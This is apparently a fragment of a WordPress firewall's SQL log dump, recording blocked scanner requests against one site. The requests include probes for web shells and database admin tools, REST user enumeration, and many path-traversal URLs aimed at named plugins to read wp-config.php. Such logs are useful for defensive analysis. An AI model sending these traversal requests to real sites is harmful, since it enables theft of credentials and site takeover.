o2l4vVcEWeL',0,1636624744.9733,796,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/system/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','ClLuJMjbGF2m4OIzy5VHX6Dw',0,1636624746.8352,974,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/beez3/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','JsxkfThqHvN6uMPlQU9cdGSI',0,1636624749.0439,1647,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/beez3/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','vhFn50rgs1fQ6auoyW4IpBO2',0,1636624752.0064,797,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/beez5/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','nTSIWmjPZLbR2vUrYxwqgHVG',0,1636624753.9500,682,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/beez5/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','WIJQNozVPTvtCgn84RBXZif9',0,1636624755.9092,808,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/beez_20/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','hGV1gxNItc8My3BnD4vjEP9i',0,1636624758.1867,493,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/beez_20/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','IM18CE94xaBQJuDeqwRm6yfc',0,1636624759.8246,694,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/protostar/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','9bsxAYCQDGSIwqoM2VnmUOFE',0,1636624761.5816,659,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/protostar/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','UQy47V8hWtsgfKo6TurXR0BY',0,1636624763.3586,632,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/atomic/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','whNAC4qeJ9EWnyz01BSFoTX7',0,1636624765.1342,553,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/atomic/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','h4zq1ZWUBXf7KoygYcTP5NEG',0,1636624766.7994,554,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/olux.php','','{\"1\":\"python-requests\\/2.26.0\"}','BJUbs7Ya2m9iTqA3XjxQ60Zr',0,1636624768.8003,655,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.26.0\"}','9BPGHC2hJiEtnZp1zuq5bc8e',0,1636624770.6672,704,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.26.0\"}','1GVO6n4l8jXaFKxIhv9boCZY',0,1636624772.5137,455,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','3u5wcLMrobjRgtm8IHv1nyVX',0,1636624774.1522,516,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','Rn8rjAFCQ3GtcXVbmgWTzqx0',0,1636624796.4684,283,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','HYLKfdOgTW05QCwzUbBZGeDF',0,1636624797.8837,487,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"python-requests\\/2.26.0\"}','d1MhzNLkHneCscmP6Ej0AZoV',0,1636624799.5636,656,'','GET',403,0,700,0,1,'',0),('181.174.125.214',3048111574,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','9AO6S2GnNDbUHjKYhmelLdIy',0,1636624969.4832,466,'','POST',403,0,600,0,1,'',0),('104.248.233.244',1761143284,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','YIgL5MwbNFP63We4ZlOfjdCB',0,1636625829.9262,243,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','TcAC8qpUZM0JfHBbGaglXdK9',0,1636625972.6333,1482,'','POST',403,0,600,0,1,'',0),('52.163.223.126',883154814,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','Y5pgPEmtjsnVa8O7yX1CrKIS',0,1636628172.7743,912,'','POST',403,0,600,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-admin/vuln.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','EMUPilyguSAJF0mkzxroGvQR',0,1636628850.3626,200,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/force-download.php?file=../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','RSKVvsCckfaurzA84TbgNPj2',0,1636628858.2398,456,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/force-download.php?file=wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','jhGqayM4AxIt68ku7mFdeoUi',0,1636628858.9731,183,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','dqoXWisTbuk7Mh1Ctv6IzJ89',0,1636628859.7090,148,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','7kMIuhRCQbPjt05GoT2epzWd',0,1636628860.4021,151,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','d2gUtaOB4Vf1eY8FqCrNHRSL',0,1636628861.1902,461,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','a34byz8mqJKcOoeNgPCurFvE',0,1636628861.9243,156,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','vLu37Nr9GfJnKdeAjCzSHtQP',0,1636628862.5078,176,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','ZaV0LJ28QqI96GCXFHzeoku5',0,1636628863.2631,565,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','eQ5yOZ70v12AGsVkS3uCtMPT',0,1636628863.9305,154,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','AgWtFe7EqLc0iryUoJHbm4X8',0,1636628864.6594,123,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','5o8Akmw7LUgyYREzQZlFqM9t',0,1636628865.3508,968,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','vK5sS97wPmQlTIbZ06jNfipq',0,1636628866.3252,176,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','aQpMefyz4WY0AowdVORDgcqE',0,1636628866.8464,174,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','O2hZNW46FvfV87RHtjzYeBL0',0,1636628867.5443,170,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','rFKms0jUW1VYO4CJGtuSZR58',0,1636628868.2608,411,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','hPY7knvsQwWaRCH3LmDbu1gV',0,1636628868.9522,144,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','oIWLBJFtw3fjMAlzbkUD49Kc',0,1636628869.7099,162,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','UzVNwgSZb8q1PaXdxjEsye0G',0,1636628870.4143,183,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','yxm96Ui8dCzLc1lHawYoqBVW',0,1636628871.0797,575,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','UdFMCpjLBv4oqsryH0cl8Kz5',0,1636628872.1842,396,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-admin/mysql-adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','RdTBijAHly5gpse1PGcLzI7S',0,1636628872.8512,174,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-admin/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','cAVE8XUfFQWB05Te2kw7JzgG',0,1636628873.5487,152,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/mysql-adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','M9UXnS7tVO1viQrsyWZflN0e',0,1636628874.3295,177,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','oD2UsT5irjzMN0bu1ad6vBht',0,1636628875.0023,536,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/uploads/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','mhjwatpNqGXiVLYxuFP9vDyQ',0,1636628876.2878,509,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/upload/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','sghCo5Ep6ctQk3ByOlDbnX7P',0,1636628877.3735,129,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer/adminer-4.7.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','9AgmkJsTdUDeNOrCa0WBiEKf',0,1636628877.9971,168,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','4pZyLch576ADfYxIriVNBlTM',0,1636628878.7765,193,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/uploads/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','OpbkIPqxRSCfly3zeh79WMHt',0,1636628879.4524,313,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/adminer/inc/editor/index.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','8egAtTuCHhIVyOXNqUKov9PD',0,1636628879.1912,725,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/_adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','xO9fgpXnaYswVWQUZi1oP3Gc',0,1636628880.9949,131,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/mirasvit_adminer_mysql.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','utJM6HrDeAykBQSNfT28EqIG',0,1636628881.7421,174,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/mirasvit_adminer_425.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','B45TZ679QabykMxKAO3VWJnF',0,1636628882.4361,835,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer/index.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','I3VLqPRyzeTwEi6tZF48uYBo',0,1636628883.1366,172,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer1.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','mPVB1YNUW3fTbl9CFJDxwAa0',0,1636628883.8875,130,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/mirasvit_adminer_431.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','7N2LBUQaXim0xdckyEDvIPOT',0,1636628884.5656,152,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/mirasvit_adminer-4.2.3.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','SgbeUHtPOcE5oszW6xFpLNmI',0,1636628885.2860,891,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer-4.6.2-cs.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','uzjiR3CWF14IUBx2mHVeAtwE',0,1636628886.0002,474,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer-4.5.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','kvCaufZlgYFw2Jnr8LjQdz3T',0,1636628886.6850,219,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer-4.3.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','IMemiRAWsSxOld2Q9KzgHFc0',0,1636628887.4783,153,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/latest.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','U1GmaBPLtDYRNEXlAjkpVwvz',0,1636628888.2398,375,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/latest-en.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','e28bC0UmMJkxnwVHg7fDtGKi',0,1636628888.9322,132,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/latest-mysql.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','Hy7JgxFiGYWVtpAfNORdBo2E',0,1636628889.7382,382,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/adminer-4.7.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','inbu3O4R8KoFk1ejp6DZB0wr',0,1636628891.2179,177,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/latest-mysql-en.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','DPmKZQbyEnAqC6j0ifeOLBHc',0,1636628890.5168,984,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/?gf_page=upload','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','yO7lhag2xYbRmACp63TJGNrM',0,1636628892.0558,562,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/?gf_page=upload','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','ht8sCl3qOYKnxD4TwWpoRFug',0,1636628893.1299,512,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/?gf_page=upload','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','cYKDotN8Wv3wpU2QIM6mPFbE',0,1636628896.0886,390,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/?up_auto_log=true','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','wbkLt6Oo5Mrji7hKXZQ8WH9C',0,1636628898.6938,153,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fashbooks.co.uk%2Fwp-admin%2F&reauth=1','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','FOkEcWpzYogwi02PRdGKlusB',0,1636628899.8835,171,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/formcraft/file-upload/server/content/upload.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','yf7cRWzqv6BkiZwXlMTsaOgC',0,1636628902.3147,410,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/posts/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','yoCLpO180MDjbX7dTgVw2YW5',0,1636628908.5399,268,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/posts/None','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko\\/20100101 Firefox\\/64.0\"}','OdS3akiVN9Y04TXj5UoxbrQu',0,1636628909.9360,189,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/hd-webplayer/playlist.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','u2txR6A3KYhSbXswfOFUvgo7',0,1636628915.3718,169,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-content/plugins/viral-optins/api/uploader/file-uploader.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','NkEFwZ3t4jJ2ps1COgDrGLK8',0,1636628919.2129,432,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wordpress/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','cUlFBJvERWNVjuCZLa5KOT8x',0,1636628920.8680,199,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','IPuksx2bO8r1JVCgUKvZBH0R',0,1636628921.5605,144,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/blog/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','iX9qQntxfeB10M4vAVOh5Hw3',0,1636628922.1886,403,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/test/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','UOvXr2L8GjhZINbxdnV7sSA9',0,1636628923.0728,439,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/site/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','n81SAriYNH7u2WvjPR5Gaf4t',0,1636628924.0074,433,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','HxFfb3AjOCJY4Gz0Qs91ZriL',0,1636628924.9598,150,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','p1eOLQuHDmEnSCGroazNh03i',0,1636628930.6766,156,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','jS4bKJcUEgTZPhkIvNaimyeY',0,1636628930.9999,179,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','vypLPEG4OYWK9Xh8oSNMtqlr',0,1636628931.3463,206,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/4','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','9XRe4ZwtJWUaimF1vYSr7sdy',0,1636628931.7241,193,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/5','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','FWiSU0euvVcfIzOKmLAb1D9J',0,1636628932.0804,464,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/6','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','UQVlMhPyr902zEcdNIRSTfjZ',0,1636628932.7100,233,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/7','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','uZPiBQ7lsH9UhGfIk2jtKAn3',0,1636628933.1351,495,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/8','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','tp5yc9m3EFVv6XfBnY0Ng1qS',0,1636628933.7955,209,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/9','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 